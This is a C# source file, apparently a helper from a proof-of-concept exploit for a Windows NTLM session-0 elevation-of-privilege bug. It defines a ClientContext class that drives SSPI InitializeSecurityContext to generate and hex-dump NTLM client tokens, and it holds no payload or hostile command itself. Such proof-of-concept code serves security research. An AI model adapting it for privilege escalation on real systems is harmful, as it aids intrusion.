﻿using NtApiDotNet;
using System;

namespace PoC_NtlmAuthSession0_EoP
{
    sealed class ClientContext : IDisposable
    {
        private readonly CredentialsHandle _creds;
        private readonly SecContextReq _req_attributes;
        private readonly SecHandle _context;
        private readonly string _target;

        public byte[] Token { get; private set; }
        public bool Done { get; private set; }

        public ClientContext(CredentialsHandle creds, SecContextReq req_attributes, string target)
        {
            _creds = creds;
            _req_attributes = req_attributes;
            _context = new SecHandle();
            _target = target;
            Continue(null);
        }

        public void Continue(byte[] token)
        {
             Done = GenClientContext(token);
        }

        private bool GenClientContext(
            byte[] token)
        {
            using (DisposableList list = new DisposableList())
            {
                SecStatusCode result = 0;

                SecBuffer out_sec_buffer = list.AddResource(new SecBuffer(SecBufferType.TOKEN, 8192));
                SecBufferDesc out_buffer_desc = list.AddResource(new SecBufferDesc(out_sec_buffer));

                if (token != null)
                {
                    SecBuffer in_sec_buffer = list.AddResource(new SecBuffer(SecBufferType.TOKEN, token));
                    SecBufferDesc in_buffer_desc = list.AddResource(new SecBufferDesc(in_sec_buffer));
                    result = Win32NativeMethods.InitializeSecurityContext(_creds, _context, _target, _req_attributes, 0,
                        SecDataRep.Native, in_buffer_desc, 0, _context, out_buffer_desc, out int context_attr, null).CheckResult();
                }
                else
                {
                    result = Win32NativeMethods.InitializeSecurityContext(_creds, null, _target,
                        _req_attributes, 0, SecDataRep.Native, null, 0, _context,
                        out_buffer_desc, out int context_attr, null).CheckResult();
                }

                if (result == SecStatusCode.CompleteNeeded || result == SecStatusCode.CompleteAndContinue)
                {
                    Win32NativeMethods.CompleteAuthToken(_context, out_buffer_desc).CheckResult();
                }

                Token = out_buffer_desc.ToArray()[0].ToArray();
                Console.WriteLine(Win32NativeMethods.BuildHexDump(Token));
                return !(result == SecStatusCode.ContinueNeeded || result == SecStatusCode.CompleteAndContinue);
            }
        }

        void IDisposable.Dispose()
        {
            Win32NativeMethods.DeleteSecurityContext(_context);
        }
    }
}
